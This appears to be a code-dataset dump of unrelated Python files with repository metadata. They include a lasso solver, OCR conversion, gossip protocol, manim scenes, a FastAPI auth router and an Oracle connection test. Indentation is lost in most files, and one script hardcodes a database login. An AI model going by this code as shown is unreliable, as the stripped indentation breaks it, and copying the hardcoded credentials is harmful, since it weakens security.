Guillaume-Garrigos/inverse-problems
| 4
|
12777678
|
import numpy as np
from numpy import linalg as la
import invprob.sparse as sparse
def fb_lasso(A, y, reg_param, iter_nb, x_ini=None, inertia=False, verbose=False):
''' Use the Forward-Backward algorithm to find a minimizer of:
reg_param*norm(x,1) + 0.5*norm(Ax-y,2)**2
Eventually outputs the functional values and support of the iterates
while running the method
reg_param is either a number, in which case we use it all along the iterations
or a sequence of size iter_nb
'''
# Manage optional input/output
if verbose: # Optional output
regret = np.zeros(iter_nb)
sparsity = np.zeros(iter_nb)
support = []
path = np.zeros((A.shape[1], iter_nb))
if x_ini is not None: # Optional initialization
x = x_ini
else:
x = np.zeros((A.shape[1], 1))
if isinstance(reg_param, (int, float)): # Fixed or not parameter
param = reg_param * np.ones(iter_nb)
else:
param = reg_param
if inertia:
alpha = [k/(k+3) for k in np.arange(iter_nb)] # asymptotically equivalent to Nesterov
else:
alpha = np.zeros(iter_nb) # no inertia
# The core of the algorithm
stepsize = 0.5 * 2 / (la.norm(A, 2)**2)
T = A.T@A
ATy = A.T@y
gradient = lambda x: x - stepsize*(T@x - ATy)
forward_backward = lambda x, param: sparse.soft_thresholding(gradient(x), param*stepsize)
x_old = x
for k in range(iter_nb):
if verbose:
regret[k] = 0.5 * la.norm(A@x - y, 2)**2 + param[k] * la.norm(x, 1)
support.append( tuple(np.where(np.abs(x) > 1e-15)[0]) )
sparsity[k] = len(support[k])
path[:, k] = x.reshape((x.shape[0]))
x, x_old = forward_backward( (1+alpha[k])*x - alpha[k]*x_old, param[k] ), x
# Output
if verbose:
details = {
"function_value": regret,
"iterate_support": support,
"iterate_sparsity": sparsity,
"iterate_path": path
}
return x, details
else:
return x
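# Minimal usage sketch (an assumption, not part of the original file): recover a sparse
# vector from a random Gaussian design with the Forward-Backward iteration above.
if __name__ == "__main__":
    np.random.seed(0)
    A = np.random.randn(60, 200)
    x_true = np.zeros((200, 1))
    x_true[:5] = 1.0                      # 5-sparse ground truth
    y = A @ x_true
    x_hat, details = fb_lasso(A, y, reg_param=0.1, iter_nb=300, inertia=True, verbose=True)
    print("recovered support size:", int(details["iterate_sparsity"][-1]))
    print("relative error:", la.norm(x_hat - x_true) / la.norm(x_true))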
| 3.1875
| 3
|
workers/convert/convert_image.py
|
dainst/cilantro
| 3
|
12777679
|
<filename>workers/convert/convert_image.py
import logging
import os
import subprocess
from PIL import Image as PilImage
import ocrmypdf
import pyocr
log = logging.getLogger(__name__)
tools = pyocr.get_available_tools()
if len(tools) == 0:
log.error("No OCR tool found")
ocr_tool = tools[0]
log.debug("Will use ocr-tool: " + ocr_tool.get_name())
ocr_langs = ocr_tool.get_available_languages()
log.debug("Available languages: %s" % ", ".join(ocr_langs))
def convert_tif_to_ptif(source_file, output_dir):
"""Transform the source TIFF file to PTIF via vips shell command."""
new_filename = os.path.join(output_dir,
os.path.splitext(os.path.basename(
source_file))[0] + '.ptif')
shell_command = subprocess.run([
"vips",
"im_vips2tiff",
source_file,
f"{new_filename}:jpeg,tile:256x256,pyramid"
])
if shell_command.returncode != 0:
log.error("PTIF conversion failed")
raise OSError(f"PTIF conversion failed")
def convert_tif_to_jpg(source_file, target_file):
"""
Convert the source TIF file to JPEG and save it as the target file.
:param str source_file: path to the TIF source file
:param str target_file: path to the generated output file
"""
if source_file != target_file:
logging.getLogger(__name__).debug(f"Converting {source_file} "
f"to {target_file}")
image = PilImage.open(source_file)
rgb_im = image.convert('RGB')
rgb_im.save(target_file)
rgb_im.close()
image.close()
def convert_jpg_to_pdf(source_file, target_file, max_size=(900, 1200)):
"""
Make a 1 Paged PDF Document from a jpg file.
:param str source_file: path to the jpg
:param str target_file: desired output path
:param tuple max_size: the maximum size in pixels of the resulting pdf
"""
image = PilImage.open(source_file)
image.thumbnail(max_size)
image.save(target_file, 'PDF', resolution=100.0)
image.close()
def tif_to_pdf(source_file, target_file, ocr_lang=None):
"""
Make a 1 Paged PDF Document from a tif file.
:param str source_file: path to the jpg
:param str target_file: desired output path
:param ocr_lang: the language used for ocr
"""
if ocr_lang is None:
_to_pdf_without_ocr(source_file, target_file)
else:
ocr_params = {
"language": ocr_lang,
"use_threads": True,
"optimize": 3
}
try:
ocrmypdf.ocr(source_file, target_file, **ocr_params)
except (ocrmypdf.exceptions.UnsupportedImageFormatError, ValueError):
log.info("UnsupportedImageFormatError, trying to convert to RGB.")
tmp_path = f'{os.path.splitext(target_file)[0]}_tmp.tif'
image = PilImage.open(source_file)
rgb_image = image.convert('RGB')
rgb_image.save(tmp_path, dpi=image.info['dpi'])
ocrmypdf.ocr(tmp_path, target_file, **ocr_params)
os.remove(tmp_path)
except ocrmypdf.exceptions.DpiError:
log.error(f'Low dpi image #{source_file}, skipping PDF OCR.')
_to_pdf_without_ocr(source_file, target_file)
def _to_pdf_without_ocr(source_file, target_file, scale=(900, 1200)):
try:
image = PilImage.open(source_file)
image.thumbnail(scale)
image.save(target_file, 'PDF', resolution=100.0)
image.close()
except ValueError:
log.info("Value, trying to convert to RGB.")
image = PilImage.open(source_file)
rgb_image = image.convert('RGB')
rgb_image.save(target_file, 'PDF', resolution=100.0)
image.close()
def tif_to_txt(source_file, target_file, language='eng'):
"""
Extract text from tiff file via OCR and writes to target file.
Available languages can be found here:
https://github.com/tesseract-ocr/tesseract/blob/master/doc/tesseract.1.asc#languages
:param str source_file: file path to tiff
:param str target_file: name of generated text-file
:param str language: used by tesseract. Possible values: see above.
"""
if language not in ocr_langs:
log.error(f'language {language} not available. Defaulting to English.')
lang = 'eng'
else:
lang = language
log.debug("Will use lang '%s'" % lang)
image = PilImage.open(source_file)
txt = ocr_tool.image_to_string(
image,
lang=lang,
builder=pyocr.builders.TextBuilder())
image.close()
with open(target_file, 'w') as outfile:
outfile.write(txt)
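# Usage sketch (an assumption, file names are illustrative): convert a scanned TIFF page
# and run OCR with German as the recognition language.
#
# convert_tif_to_jpg("scan_0001.tif", "scan_0001.jpg")
# tif_to_pdf("scan_0001.tif", "scan_0001.pdf", ocr_lang="deu")
# tif_to_txt("scan_0001.tif", "scan_0001.txt", language="deu")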
| 2.84375
| 3
|
txgossip/scuttle.py
|
jrydberg/txgossip
| 5
|
12777680
|
# Copyright (C) 2011 <NAME>
# Copyright (C) 2010 <NAME>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from txgossip.state import PeerState
class Scuttle(object):
def __init__(self, peers, local_peer):
self.peers = peers
self.local_peer = local_peer
def digest(self):
digest = {}
for peer, state in self.peers.items():
digest[peer] = state.max_version_seen
return digest
def scuttle(self, digest):
deltas_with_peer = []
requests = {}
new_peers = []
for peer, digest_version in digest.items():
if not peer in self.peers:
requests[peer] = 0
new_peers.append(peer)
else:
state = self.peers[peer]
if state.max_version_seen > digest_version:
deltas_with_peer.append((
peer,
self.peers[peer].deltas_after_version(digest_version)
))
elif state.max_version_seen < digest_version:
requests[peer] = state.max_version_seen
# Sort by peers with most deltas
def sort_metric(a, b):
return len(b[1]) - len(a[1])
deltas_with_peer.sort(cmp=sort_metric)
deltas = []
for (peer, peer_deltas) in deltas_with_peer:
for (key, value, version) in peer_deltas:
deltas.append((peer, key, value, version))
return deltas, requests, new_peers
def update_known_state(self, deltas):
for peer, key, value, version in deltas:
self.peers[peer].update_with_delta(
str(key), value, version)
def fetch_deltas(self, requests):
deltas = []
for peer, version in requests.items():
peer_deltas = self.peers[peer].deltas_after_version(
version)
for (key, value, version) in peer_deltas:
deltas.append((peer, key, value, version))
return deltas
| 2.0625
| 2
|
generators.py
|
m87/pyEM
| 0
|
12777681
|
<gh_stars>0
import numpy as np
import os
from scipy import linalg
from config import *
def fixed_generator(models, size, init):
clusters = len(models[WEIGHTS])
out=[]
ini = []
labels =[]
n= int(size/clusters)+1
for m in range(clusters):
w=np.random.multivariate_normal(models[MEANS][m],models[COVARS][m],n)
x = [[i,m] for i in w ]
out.extend(x)
ini.append(w[0])
out = tuple(zip(*out))
if init == INIT_RANDOM:
a = np.random.choice(range(len(out[0])), clusters)
ini =[]
for i in a:
ini.append(out[0][i])
return np.array(out[0]),ini, np.array(out[1])
def lim_generator():
pass
| 2.25
| 2
|
parse_xml.py
|
WillMatthews/refmanager
| 1
|
12777682
|
<filename>parse_xml.py
#!/usr/bin/python3
# script to parse an EndNote XML database file, and populate a mysql database with the contents
import xml.etree.ElementTree as Etree
import pymysql
#from termcolor import colored
nums = []
count = 0
dictList = []
stdDict = {"title":"","author":"","key":"","year":"","abstract":"","keywords":"","volume":"","number":"","pages":"","url":"","comments":""}
root = Etree.parse('old_database.xml').getroot()
for records in root:
for record in records:
newdict = stdDict.copy()
#print("\n\n")
for element in record:
#print(element.tag)
workingtext = ""
ispresent = False
#print(colored(element.tag,"green"))
#if element.text is not None:
# print(" " + element.text)
for part in element:
if part.text is not None:
title = element.tag
workingtext += part.text + " "
ispresent = True
else:
for subpart in part:
#print(colored(subpart.tag,"blue"))
if subpart.text is not None:
title = part.tag
workingtext += subpart.text + " "
ispresent = True
else:
for subsubpart in subpart:
title = subpart.tag
workingtext += subsubpart.text + " "
ispresent = True
if ispresent:
if title == "secondary-title":
title = "title"
elif title == "foreign-keys":
title = "key"
elif title == "keyword":
title = "keywords"
#print(colored(title,"red"))
#print(" " + workingtext)
newdict[title] = workingtext.replace("\r","\n").strip()
count += 1
dictList.append(newdict)
for d in dictList:
print(d)
print("\n\n")
d["key"] = int(d["key"])
nums.append(d["key"])
nums.sort()
print("\n\n")
print("Missing entries between 1 and " + str(max(nums)) + ":")
for i in range(1,max(nums)):
if i not in nums:
print(i)
print("\n")
print(str(count) + " Entries found in DB file")
conn = pymysql.connect(host='localhost', user="will", passwd="will", db='agricoat', charset = 'utf8mb4', cursorclass=pymysql.cursors.DictCursor)
cur = conn.cursor()
sql = """INSERT INTO library (`title`, `author`, `key`, `year`, `abstract`, `keywords`, `volume`, `number`, `pages`, `url`, `comments`) VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s,%s);"""
count2 = 0
for d in dictList:
cur.execute(sql,(d["title"],d["author"],d["key"],d["year"],d["abstract"],d["keywords"],d["volume"],d["number"],d["pages"],d["url"],d["comments"],))
conn.commit()
count2 += 1
print("Inserted value " + str(count2) + " of: "+ str(count))
cur.close()
conn.close()
| 3
| 3
|
videos/HomeworkVol03/678-widcardw.py
|
AStarySky/manim_sandbox
| 366
|
12777683
|
<gh_stars>100-1000
# from widcardw
from manimlib.imports import *
class Test6(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
circle0 = Circle(radius=1.5, stroke_color="#559944", plot_depth=-2)
doto = Dot(ORIGIN, color="#000000")
texto = TexMobject("O", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6).next_to(
doto, RIGHT+DOWN, buff=SMALL_BUFF)
self.play(ShowCreation(circle0))
self.play(Write(doto), Write(texto))
dota = Dot(np.array([3.2, 0, 0]), color="#000000", plot_depth=1)
texta = TexMobject("A", color="#000000").next_to(
dota, RIGHT+DOWN, buff=SMALL_BUFF)
self.play(Write(dota), Write(texta))
t = ValueTracker(2)
dotb = Dot(color="#bb3333", plot_depth=1).add_updater(lambda b: b.move_to(np.array([
1.5*np.cos(t.get_value()), 1.5*np.sin(t.get_value()), 0
])))
textb = TexMobject("B", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6).add_updater(
lambda b: b.next_to(dotb, UP+LEFT, buff=SMALL_BUFF))
self.play(Write(dotb), Write(textb))
self.wait(0.2)
l_ab = DashedLine(color="#bb7755", stroke_width=1.5, plot_depth=0).add_updater(
lambda l: l.put_start_and_end_on(dota.get_center(), dotb.get_center()))
self.play(ShowCreation(l_ab))
self.wait(0.2)
self.play(t.increment_value, 1, rate_func=smooth)
self.play(t.increment_value, -3, rate_func=smooth)
l_b = Line(LEFT, RIGHT).add_updater(lambda l: l.become(
Line(color="#55aaee", plot_depth=0).rotate(l_ab.get_angle()+PI/2,
about_point=l_ab.get_start())
.move_to(l_ab.get_end()).scale(20)
))
dotc = Dot(stroke_opacity=0, fill_opacity=0).add_updater(
lambda d: d.move_to(l_b.get_start()))
self.play(ShowCreation(l_b))
self.add(dotc)
anglea = Angle(dota, dotb, dotc)\
.add_updater(lambda a: a.become(Angle(dota, dotb, dotc, color="#E65A4C")))
self.play(ShowCreation(anglea))
for i in range(50):
self.play(t.increment_value, TAU/50,
rate_func=linear, run_time=0.12)
l_b.clear_updaters()
l_b.plot_depth = -1
l_bc = l_b.copy().set_stroke(width=1.5, color="#00aaff")
self.add(l_bc)
l_b.add_updater(lambda l: l.become(
Line(color="#55aaee", plot_depth=0).rotate(l_ab.get_angle()+PI/2,
about_point=l_ab.get_start())
.move_to(l_ab.get_end()).scale(20)
))
self.add(l_b)
anglea.clear_updaters()
l_b.clear_updaters()
self.play(FadeOut(anglea), FadeOut(l_b))
self.wait(3)
class Test7(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
t = ValueTracker(0)
doto = Dot(DOWN*0.6, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.5)
dotp = Dot(np.array([0, -2.7, 0]), color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.5)
dota = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.5).add_updater(lambda d: d.move_to(np.array([
doto.get_center()[0]+np.cos(t.get_value()),
doto.get_center()[1]+np.sin(t.get_value()), 0
])))
cira = Circle().add_updater(lambda c: c.become(
Circle(radius=get_line_long(dotp.get_center(),
dota.get_center()), color="#559944").move_to(dota.get_center())
))
texto = TexMobject(
"O", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6)\
.scale(0.7).next_to(doto, DOWN+RIGHT, buff=SMALL_BUFF)
textp = TexMobject(
"P", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6)\
.scale(0.7).next_to(dotp, DOWN+LEFT, buff=SMALL_BUFF)
texta = TexMobject(
"A", color="#000000", background_stroke_color="#ffffff", background_stroke_width=6)\
.scale(0.7).add_updater(lambda a: a.next_to(dota, DOWN+LEFT, buff=SMALL_BUFF))
ciro = Circle(radius=1, color="#bb7755").move_to(doto.get_center())
dotpc = Dot(color="#000000").scale(0.5).move_to(dotp.get_center())
l_pa = DashedLine(color="#55bb33", stroke_width=1.5).add_updater(lambda l: l.put_start_and_end_on(
dota.get_center(), dotpc.get_center()))
self.play(ShowCreation(ciro), Write(doto), Write(texto))
self.play(Write(dotp), Write(textp))
self.wait(0.3)
self.play(Write(dota), Write(texta))
self.add(dotpc)
self.play(ShowCreation(l_pa))
path = TracedPath(dotpc.get_center,
stroke_color="#559944", stroke_width=3)
self.add(path)
self.play(Rotating(dotpc, about_point=dota.get_center()),
run_time=1.8, rate_func=smooth)
# self.play(ShowCreation(cira))
l_pa.clear_updaters()
self.remove(dotpc, path)
self.play(FadeOut(l_pa), FadeIn(cira))
self.play(t.increment_value, -PI/2)
self.wait(0.3)
for i in range(40):
self.play(t.increment_value, TAU/40,
rate_func=linear, run_time=0.2)
cira.clear_updaters()
ciracpy = cira.copy().set_color("#9944bb").set_stroke(width=1.5)
self.add(ciracpy)
cira.add_updater(lambda c: c.become(
Circle(radius=get_line_long(dotp.get_center(),
dota.get_center()), color="#559944").move_to(dota.get_center())
))
self.add(cira)
# Note: get_line_long is defined by Shy_Vector;
# if it is not available, use get_norm(...) instead.
cira.clear_updaters()
self.play(FadeOut(cira))
self.wait(2.5)
class Test8(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
doto = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)
dota = Dot(LEFT*1.8, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)
dotb = Dot(RIGHT*1.8, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)
texto = TexMobject("O", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7).next_to(doto, RIGHT+DOWN, buff=SMALL_BUFF)
texta = TexMobject("A", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7).next_to(dota, LEFT, buff=SMALL_BUFF)
textb = TexMobject("B", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7).next_to(dotb, RIGHT, buff=SMALL_BUFF)
ciro = Circle(radius=1.8, color="#559944")
l_ab = Line(LEFT*1.8, RIGHT*1.8, color="#4488dd")
self.play(ShowCreation(ciro), Write(doto), Write(texto))
self.play(ShowCreation(l_ab), *[Write(obj)
for obj in [dota, dotb, texta, textb]])
self.wait(0.3)
t = ValueTracker(1)
dotp = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2).scale(0.7)\
.add_updater(lambda d: d.move_to(np.array([
1.8*np.cos(t.get_value()), 1.8*np.sin(t.get_value()), 0
])))
textp = TexMobject("P", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).scale(0.7)\
.add_updater(lambda p: p.next_to(dotp, UP+RIGHT, buff=SMALL_BUFF))
self.play(Write(dotp), Write(textp))
self.wait(0.2)
cirp = Circle(radius=2).add_updater(lambda c: c.become(
Circle(radius=abs(dotp.get_center()[1]), color="#dd7766")
.move_to(dotp.get_center())
))
self.play(ShowCreation(cirp))
self.play(t.increment_value, 1)
self.play(t.increment_value, -2)
self.wait(0.2)
for i in range(40):
self.play(t.increment_value, TAU/40,
rate_func=linear, run_time=0.2)
cirp.clear_updaters()
cirpc = cirp.copy().set_stroke(width=1.5, color="#715582")
self.add(cirpc)
cirp.add_updater(lambda c: c.become(
Circle(radius=abs(dotp.get_center()[1]), color="#dd7766")
.move_to(dotp.get_center())))
self.add(cirp)
cirp.clear_updaters()
textp.clear_updaters()
dotp.clear_updaters()
self.wait()
self.play(*[FadeOut(obj)
                    for obj in [doto, dota, dotb, texta, textb, textp, dotp, l_ab, ciro, texto]])
self.wait(2)
'''
to be completed...
class Test5(Scene):
CONFIG = {"camera_config": {"background_color": "#ffffff"}}
def construct(self):
dotb = Dot(LEFT*2, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)
dotc = Dot(RIGHT*2, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)
dota = Dot(LEFT*2+UP*1.3, color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)
texta = TexMobject("A", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).next_to(dota, UP+LEFT, buff=SMALL_BUFF)
textb = TexMobject("B", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).next_to(dotb, LEFT+DOWN, buff=SMALL_BUFF)
textc = TexMobject("C", color="#000000", background_stroke_color="#ffffff",
background_stroke_width=6, plot_depth=2).next_to(dotc, RIGHT+DOWN, buff=SMALL_BUFF)
l_ab = Line(color="#559944")\
.put_start_and_end_on(dota.get_center(), dotb.get_center())
l_bc = Line(color="#559944")\
.put_start_and_end_on(dotc.get_center(), dotb.get_center())
self.play(*[ShowCreation(obj)
for obj in [l_ab, l_bc, dota, dotb, dotc]])
self.play(*[Write(obj) for obj in [texta, textb, textc]])
self.wait(0.3)
t = ValueTracker(0)
def p_pos(t):
return np.array([0, 0, 0])
dotp = Dot(color="#000000", background_stroke_color="#ffffff",
background_stroke_width=3, plot_depth=2)\
.add_updater(lambda d: d.move_to())'''
| 2.109375
| 2
|
modules/pymol/embed/epymol/__init__.py
|
hryknkgw/pymolwin
| 2
|
12777684
|
from pymol.embed import EmbeddedPyMOL
class ePyMOL(EmbeddedPyMOL):
def __init__(self):
self.ep_init()
# initial mouse position
self.lastx = self.x = 30
self.lasty = self.y = 30
def SetSize(self, width, height):
self.ep_reshape(width,height)
def OnChar(self,code):
self.ep_char(0,0,code,0,0,0)
def OnSpecial(self,code):
self.ep_special(0,0,code,0,0,0)
def OnPaint(self):
self.OnDraw()
def OnMouseDown(self,*arg):
self.ep_mouse_down(*arg)
def OnMouseUp(self,*arg):
self.ep_mouse_up(*arg[0:2])
def OnMouseMotion(self,*arg):
self.ep_motion(*arg)
def OnDraw(self):
self.ep_draw()
def OnIdle(self):
self.ep_idle()
def GetRedisplay(self):
return self.ep_get_redisplay()
def CheckPyMOL(self):
pass
#if self.ep_get_redisplay():
# self.Repaint()
def Repaint(self):
pass
| 2.765625
| 3
|
testes/teste_Conexao_Oracle.py
|
almirjgomes/DE_DataBaseConnect
| 0
|
12777685
|
<filename>testes/teste_Conexao_Oracle.py
import pandas as pd
import DE_DataBase as dtb
db = dtb.DATABASE()
def teste_ORACLE():
try:
monterey = {"database": "Oracle",
"name_conection": "MONTEREY",
"path_library": None,
"instance": None,
"host": "brlsplporc-scan.DASA.NET",
"port": "1521",
"service_name": "DASABI",
"sid": None,
"username": "monterey",
"password": "<PASSWORD>"
}
gliese = {"database": "Oracle",
"name_conection": "GLIESE",
"path_library": None,
"instance": None,
"host": "brlsplprdb01.dasa.net",
"port": "1521",
"service_name": None,
"sid": "stbpsoracle1",
"username": "svc_bi",
"password": "<PASSWORD>"
}
engine = db.ORACLE(gliese)
sql = "select sysdate from dual"
df = pd.read_sql(sql, engine)
print(df)
msg = "Conexao bem sucedida"
except Exception as error:
msg = error
finally:
print(msg)
if __name__ == "__main__":
teste_ORACLE()
| 2.484375
| 2
|
src/routers/rotas_auth.py
|
daianasousa/Projeto-BLX
| 0
|
12777686
|
<filename>src/routers/rotas_auth.py
from fastapi import APIRouter, status, Depends, HTTPException
from typing import List
from sqlalchemy.orm import Session
from src.schemas.schemas import Usuario, UsuarioSimples, LoginSucesso, LoginData
from src.infra.sqlalchemy.config.database import get_db
from src.infra.sqlalchemy.repositorios.repositorio_usuario \
import RepositorioUsuario
from src.infra.providers import hash_provider, token_provider
from src.routers.auth_utils import obter_usuario_logado
router = APIRouter()
@router.post('/signup',
status_code=status.HTTP_201_CREATED,
response_model=UsuarioSimples)
def signup(usuario: Usuario, session: Session = Depends(get_db)):
# verificar se já existe usuário para telefone
usuario_localizado = RepositorioUsuario(
session).obter_por_telefone(usuario.telefone)
if usuario_localizado:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,
detail="Já existe um usuário para esse telefone")
# criar novo usuario
usuario.senha = hash_provider.gerar_hash(usuario.senha)
usuario_criado = RepositorioUsuario(session).criar(usuario)
return usuario_criado
@router.post('/token', response_model=LoginSucesso)
def login(login_data: LoginData, session: Session = Depends(get_db)):
senha = login_data.senha
telefone = login_data.telefone
usuario = RepositorioUsuario(session).obter_por_telefone(telefone)
if not usuario:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,
detail='Telefone ou senha estão incorrentes!')
senha_valida = hash_provider.verificar_hash(senha, usuario.senha)
if not senha_valida:
raise HTTPException(status_code=status.HTTP_400_BAD_REQUEST,
detail='Telefone ou senha estão incorrentes!')
# Gerar Token JWT
token = token_provider.criar_access_token({'sub': usuario.telefone})
return LoginSucesso(usuario=usuario, access_token=token)
@router.get('/me', response_model=UsuarioSimples)
def me(usuario: Usuario = Depends(obter_usuario_logado)):
return usuario
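# Illustrative request flow (added; field names inferred from the handlers above,
# the full Usuario schema may include more fields):
#   POST /signup  with a Usuario JSON body (at least "telefone" and "senha")  -> 201 + UsuarioSimples
#   POST /token   with {"telefone": "...", "senha": "..."}                    -> LoginSucesso with a JWT
#   GET  /me      with an "Authorization: Bearer <access_token>" header       -> UsuarioSimples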
| 2.484375
| 2
|
solution/lc033.py
|
sth4nothing/pyleetcode
| 0
|
12777687
|
class Solution(object):
def search(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
import bisect
if not nums:
return -1
n = len(nums)
k = n
for i in range(1, n):
if nums[i - 1] > nums[i]:
k = i
break
r = (0, k) if target >= nums[0] else (k, n)
idx = bisect.bisect_left(nums, target, *r)
if 0 <= idx < n and nums[idx] == target:
return idx
return -1
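# Illustrative trace (added, not part of the original solution):
#   nums = [4, 5, 6, 7, 0, 1, 2], target = 0
#   pivot k = 4 (first index where nums[i-1] > nums[i]); since target < nums[0],
#   bisect_left searches nums[4:7] and returns index 4.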
| 3.34375
| 3
|
assertpy/__init__.py
|
santunioni/assertpy
| 246
|
12777688
|
from __future__ import absolute_import
from .assertpy import assert_that, assert_warn, soft_assertions, fail, soft_fail, add_extension, remove_extension, WarningLoggingAdapter, __version__
from .file import contents_of
| 1.085938
| 1
|
src/practitioner/classify_ai4i2020.py
|
jpastorino/Data-Blind-ML
| 0
|
12777689
|
<gh_stars>0
import numpy as np
import sklearn as scikit
import tensorflow as tf
from preprocessing import Preprocessing
from evaluation import EvaluationClient
from sklearn.model_selection import train_test_split
# #####################################################################################################################
# Implementation of Pre-Processing
# #####################################################################################################################
class MyPreprocess(Preprocessing):
def prepare(self, in_data):
from sklearn.preprocessing import OneHotEncoder
x = in_data[:, 2:8]
ohe = OneHotEncoder()
sample_type = ohe.fit_transform(x[:, 0].reshape(-1, 1)).toarray()
x = np.append(x, sample_type, axis=1)
x = np.delete(x, 0, axis=1)
x = np.asarray(x).astype('float32')
x = scikit.preprocessing.normalize(x)
y = in_data[:, 8].astype('float32')
return x, y
if __name__ == "__main__":
print(f"""Using Tensorflow version {tf.__version__}""")
# ------------------------------------------------------------------------------------------------------------------
# LOADING DATA
data_synthetic = np.load("../../data/generated/ai4i2020_synt.npz", allow_pickle=True)
data_synthetic = data_synthetic["data"]
print(f"""Ai4i Synthetic data shape:{data_synthetic.shape}""")
# ------------------------------------------------------------------------------------------------------------------
# Preprocessing
pre_proc = MyPreprocess()
x, y = pre_proc.prepare(data_synthetic)
print(f"""Preprocessed data: x:{x.shape}, y:{y.shape}""")
x_train, x_test, y_train, y_test = train_test_split(x, y)
print(f"""Train: x:{x_train.shape}, y:{y_train.shape}. Test: x:{x_test.shape}, y:{y_test.shape}""")
# ------------------------------------------------------------------------------------------------------------------
# DEFINING THE MODEL AND TRAINING
model = tf.keras.models.Sequential(name="AI4I_Synthetic")
model.add(tf.keras.layers.Dense(units=150, name="dense1", input_shape=[8]))
model.add(tf.keras.layers.Dropout(0.8, name="dropout_1"))
model.add(tf.keras.layers.Dense(units=150, name="dense2"))
model.add(tf.keras.layers.Dropout(0.8, name="dropout_2"))
model.add(tf.keras.layers.Dense(3, activation=tf.nn.softmax, name="dense3_softmax"))
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=["accuracy"])
# ------------------------------------------------------------------------------------------------------------------
# Training
model.fit(x_train, y_train, batch_size=8, epochs=15)
# ------------------------------------------------------------------------------------------------------------------
# Local Evaluation
print()
print(f"={'Evaluating using synthetic data':^78}=")
print(model.evaluate(x_test, y_test))
# ------------------------------------------------------------------------------------------------------------------
# Remote Evaluation
eval = EvaluationClient("goliath.ucdenver.pvt", 35000)
eval.evaluate_model("079A7", "AI4ISynthetic", model, pre_proc)
| 2.6875
| 3
|
src/main/python/coding_problems/bs_detect_the_only_duplicate_in_list.py
|
ikumen/today-i-learned
| 0
|
12777690
|
<reponame>ikumen/today-i-learned
"""
You are given a list nums of length n + 1 picked from the range 1, 2, ..., n. By the pigeonhole principle, there must be a duplicate. Find and return it. There is guaranteed to be exactly one duplicate.
Bonus: Can you do this in O(n) time and O(1) space?
Constraints
n ≤ 10,000
https://binarysearch.com/problems/Detect-the-Only-Duplicate-in-a-List
"""
class Solution:
def solve2(self, nums):
unique = set()
for n in nums:
if n in unique:
return n
unique.add(n)
return None
def solve(self, nums):
# given sum of natural numbers 1..n = n(n+1)/2
n = len(nums)-1
s = sum(nums)
return s - ((n * (n + 1)) // 2)
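# Quick sanity check (added): Solution().solve([1, 2, 3, 2]) -> 8 - 3*4//2 -> 2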
| 3.578125
| 4
|
rl_agents/trainer/logger.py
|
neskoc/rl-agents
| 342
|
12777691
|
<reponame>neskoc/rl-agents<gh_stars>100-1000
import json
import logging.config
from pathlib import Path
import gym
from rl_agents.configuration import Configurable
logging_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"standard": {
"format": "[%(levelname)s] %(message)s "
},
"detailed": {
"format": "[%(name)s:%(levelname)s] %(message)s "
}
},
"handlers": {
"default": {
"level": "INFO",
"formatter": "standard",
"class": "logging.StreamHandler"
}
},
"loggers": {
"": {
"handlers": [
"default"
],
"level": "DEBUG",
"propagate": True
}
}
}
def configure(config={}, gym_level=gym.logger.INFO):
"""
Configure logging.
Update the default configuration by a configuration file.
Also configure the gym logger.
:param config: logging configuration, or path to a configuration file
:param gym_level: desired level for gym logger
"""
if config:
if isinstance(config, str):
with Path(config).open() as f:
config = json.load(f)
Configurable.rec_update(logging_config, config)
logging.config.dictConfig(logging_config)
gym.logger.set_level(gym_level)
def add_file_handler(file_path):
